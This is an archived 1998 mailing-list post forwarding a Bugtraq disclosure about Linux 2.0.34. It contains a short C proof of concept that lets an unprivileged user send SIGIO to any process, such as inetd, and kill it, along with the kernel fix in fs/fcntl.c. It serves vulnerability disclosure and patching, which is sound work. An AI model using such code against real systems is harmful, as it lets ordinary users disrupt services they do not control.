[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]

Serious Linux 2.0.34 security problem (fwd)

From: Annex <annex thing annexgrp org>
To: linux-security redhat com
Subject: Serious Linux 2.0.34 security problem (fwd)
Date: Thu, 2 Jul 1998 11:03:32 +0600 (BGT)

---------- Forwarded message ----------
Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer UCS UWA EDU AU>
To: BUGTRAQ NETSPACE ORG
Subject: Serious Linux 2.0.34 security problem

I just saw this mentioned on linux-kernel and confirmed it;

#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;

  if(argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}

This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO.  Very bad.

The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.

David.

Follow-Ups:
- [linux-security] Re: Serious Linux 2.0.34 security problem (fwd)
  - From: Linux mailing list user

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]